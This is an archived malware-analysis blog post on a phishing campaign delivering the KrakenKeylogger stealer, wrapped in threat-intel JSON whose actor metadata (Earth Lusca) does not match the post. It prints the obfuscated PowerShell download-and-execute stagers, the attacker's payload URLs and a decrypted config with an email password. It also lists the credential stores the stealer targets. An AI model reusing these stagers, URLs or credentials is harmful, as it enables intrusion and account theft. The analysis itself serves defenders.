{
	"id": "a3b6653d-6cba-42cb-a1e0-aec26cac4dec",
	"created_at": "2026-04-06T00:22:22.336842Z",
	"updated_at": "2026-04-10T03:36:47.655087Z",
	"deleted_at": null,
	"sha1_hash": "66682c2bb3e5591d136892d1ccd69dc032f8fb2c",
	"title": "Kraken - The Deep Sea Lurker Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10071324,
	"plain_text": "Kraken - The Deep Sea Lurker Part 1\nBy 0xToxin\nPublished: 2023-05-20 · Archived: 2026-04-05 15:58:46 UTC\nIntro\nIn this first part we will go through a recent phishing campaign delivering a never-before-seen “KrakenKeylogger” malware.\nThe Phish\nThe mail sent to the victim is a simple malspam mail with an archive attachment:\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\nPage 1 of 15\nThe archive is a .zip archive that contains a .lnk file:\nLNK Analysis\nIn order to analyze an .lnk file I use the LECmd tool. The tool shows that the .lnk will execute PowerShell.exe with the following argument:\nPowerShell Script\nLet’s break down the script:\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted $ProgressPreference =\nfunction nvRClWiAJT($OnUPXhNfGyEh){\n    $OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')\n};\nfunction sDjLksFILdkrdR($OnUPXhNfGyEh){\n    $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;\n    for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){\n        try{\n            $zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)\n        }\n        catch{\n            $zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)\n        }\n    };\n    $zRavFAQNJqOVxb\n};\n$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';\n$cDkdhkGBtl = $env:APPDATA + '\\' + ($NpzibtULgyi -split '/')[-1];\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\n$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;\n[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); \u0026 $cDkdhkGBtl;\nsleep 3;\nrm $cDkdhkGBtl;\nThe script builds a new string which is the URL of the next payload: it takes the obfuscated URL string and deobfuscates it in several steps:\n1. The string is reversed by the function nvRClWiAJT.\n2. A for loop iterates through the reversed string, jumping 2 chars at a time.\n3. In each iteration the 2 chars are reversed again; in the last iteration the remaining single char is reversed as well, which has no effect.\nHere is a quick Python script that performs this process:\ninput_string = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'[::-1]\noutput_string = ''\nfor i in range(0, len(input_string), 2):\n    try:\n        # swap each pair of characters back\n        tmp = input_string[i] + input_string[i + 1]\n        output_string += tmp[::-1]\n    except IndexError:\n        # odd-length string: the last char stands alone\n        output_string += input_string[i]\nprint(output_string)\nhttps://masherofmasters.cyou/chin/se1.hta\nse1.hta\nThe fetched payload is yet another PowerShell script:\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted\nfunction WQgtWbWK($FL, $i){\n    [IO.File]::WriteAllBytes($FL, $i)\n};\nfunction APcZNMgjQ($FL){\n    if($FL.EndsWith((QXUpF @(4995,5049,5057,5057))) -eq $True){\n        Start-Process (QXUpF @(5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050)) $FL\n    }else{\n        Start-Process $FL\n    }\n};\nfunction laiLJMT($eh){\n    $LM = New-Object (QXUpF @(5027,5050,5065,4995,5036,5050,5047,5016,5057,5054,5050,5059,5065));\n    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;\n    $i = $LM.DownloadData($eh);\n    return $i\n};\nfunction QXUpF($P){\n    $n=4949;\n    $s=$Null;\n    foreach($WK in $P){\n        $s+=[char]($WK-$n)\n    };\n    return $s\n};\nfunction deaNPih(){\n    $AVYABiApT = $env:APPDATA + '\\';\n    $XdOFJCmMx = laiLJMT (QXUpF @(5053,5065,5065,5061,5064,5007,4996,4996,5058,5046,5064,5053,5050,5063,5060,505\n    $qNfQDXYlR = $AVYABiApT + 'se1.exe';\n    WQgtWbWK $qNfQDXYlR $XdOFJCmMx;\n    APcZNMgjQ $qNfQDXYlR;;;;\n}\ndeaNPih;\nThe script has several obfuscated strings that are deobfuscated by the function QXUpF, which simply goes over each number and subtracts 4949 from it. Here is a quick script that deobfuscates those strings and prints them in clear:\nstringsList = [[4995,5049,5057,5057],[5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050],[5027,5050,5\nfor string in stringsList:\n    tmp = ''\n    for char in string:\n        # each number is the character code plus 4949\n        tmp += chr(char - 4949)\n    print(f'[+] - {tmp}')\n[+] - .dll\n[+] - rundll32.exe\n[+] - Net.WebClient\n[+] - https://masherofmasters.cyou/chin/se1.exe\nThe script downloads another file from the same domain that was used to fetch the .hta file in the previous PowerShell script.\n.NET Loader\nStage 1\nThe fetched executable (se1.exe) is a .NET executable:\nThe loader decrypts the embedded resource DataBasePracticalJob using the RC2 algorithm; the decryption key is the MD5 hash of the hardcoded string QEssDJZhQnLywDnJGpBEr (the interesting part here is that the hash is computed over the string after encoding it with BigEndianUnicode, which appends a 0x00 suffix to each byte). Here is a diagram of the decryption process:\nYou can use this CyberChef recipe to calculate the MD5 hash easily. Then, using RC2 decryption in CyberChef, we can also extract the 2nd stage:\nStage 2\nThe second stage is a .NET DLL which is invoked by the first-stage executable.\nThe DLL is invoked through its first public exported method, which is syncfusion:\nThe second-stage DLL has 2 embedded resources that are decrypted. The first embedded resource, SeaCyanPul, is a .DLL in charge of injecting the final payload into RegAsm.exe (I won’t go into it right now, but the 3rd stage will be uploaded to Malware Bazaar).\nThe second resource, UnknownDetails, is our final payload, which is decrypted using a simple AES-ECB routine without an IV; the key in this case is the SHA256 of a null value:\nAs I wrote before, the payload is injected into RegAsm.exe.\nKraken Payload\nThe Kraken payload is a 32-bit .NET binary, so we can use dnSpy to go over some of its functionalities.\nKraken Configs\nThe Kraken configs are stored in the .cctor of the main class:\nSome of the configs are encrypted using a DES-ECB routine without an IV; the key is the MD5 hash of a preconfigured string, in this case swCpiTiAhkkEpyDZTnAGhOBZpr. Here is a quick Python script that decrypts the config strings for us:\nimport base64\nimport malduck\nfrom Crypto.Cipher import DES\n\nencryptedStringsDict = {\n    'PersonalEmail': 'KYlYJirrzmj9NFMzqVxdqqmBPWvogKC9',\n    'PersonalEmailPassword': 'lNI13bp6TxER2sT4YYxfjw==',\n    'PersonalEmailHost': '6pvSg6TWhxedDZq2k3/l06fwica30Jlg',\n    'TheSMTPReciver': 'qUQWGy6wVRm4PKDty97tnE+Z3alydqyP',\n    'PersonalEmailPort': 'VqONpyzLqFY=',\n    'PersonalHostLink': 'EdrE+GGMX48=',\n    'PersonalHostPassword': 'EdrE+GGMX48=',\n    'PersonalHostUsername': 'EdrE+GGMX48=',\n    'TheTelegramToken': 'EdrE+GGMX48=',\n    'PersonalTeleID': 'EdrE+GGMX48='\n}\n# DES uses an 8-byte key: the first 8 bytes of the MD5 digest\nmd5hashKey = malduck.md5(b'swCpiTiAhkkEpyDZTnAGhOBZpr')[:8]\nfor k, v in encryptedStringsDict.items():\n    des = DES.new(md5hashKey, DES.MODE_ECB)\n    decVal = des.decrypt(base64.b64decode(v))\n    print(f'[+] {k} - {decVal.decode()}')\n[+] PersonalEmail - onuma.b@thereccorp.com\n[+] PersonalEmailPassword - O@1234\n[+] PersonalEmailHost - mail.thereccorp.com\n[+] TheSMTPReciver - jbs.hannong@gmail.com\n[+] PersonalEmailPort - 587\n[+] PersonalHostLink\n[+] PersonalHostPassword\n[+] PersonalHostUsername\n[+] TheTelegramToken\n[+] PersonalTeleID\nSo now we have the configuration of Kraken; let’s move on to an overview of some capabilities:\nCustom Commands\nKraken has several functions that can be executed (only if the user of the malware flags them during the compilation process of the stub), such as:\nTimeToRun\nLoadWeb\nDisable_Task\nDisable_CommandPrompt\nDisable_Regis\nProcessKiller\nNothing really interesting here, probably some persistence methods/VM checks.\nHarvesting Capabilities\nKraken follows the usual info-stealer path, stealing credentials from the local Outlook, Foxmail and Thunderbird mail clients.\nIt will look for credentials in these browsers:\nGoogle Chrome\nQQ Browser\nVivaldi Browser\nChromium Browser\nCent Browser\nChedot Browser\n360Browser\nBrave\nTorch\nUC Browser\nBlisk\nOpera\nAvast Browser\nEdge\nGoogle Chrome Canary\nFirefox\nCocCoc\nCitrio Browser\nCoolNovo\nEpic Privacy Browser\nKraken will also look for FileZilla credentials.\nExfiltration\nKraken allows exfiltration via:\nFTP\nSMTP\nTelegram Bot\nFTP\nSMTP\nTelegram Bot\nPost Exfiltration Actions\nAfter the stealing process is done, Kraken automatically starts a keylogging process plus screenshot capturing of the victim’s computer:\nIOCs\nDoc signed Subcontract Agreement.zip - 79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953\nseedof.lnk - beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd\n1st.exe - dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79\n2nd.dll - f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b\n3rd.dll - 43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17\nKraken.exe - ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000\nSummary\nIn this blog I’ve covered a new .NET-based stealer/keylogger malware, the way it was used in a phishing campaign, and a dive into the loader/injection process, including an overview of the malware capabilities and config extraction.\nPart 2\nIn part 2 I will explain my threat hunting process, why the malware was being falsely flagged, and how I managed to find more samples that helped me confirm my findings.\nPart 2 is up! Check it out right here.\nSource: https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/"
	],
	"report_names": [
		"KrakenKeylogger-pt1"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434942,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.pdf",
		"text": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.txt",
		"img": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.jpg"
	}
}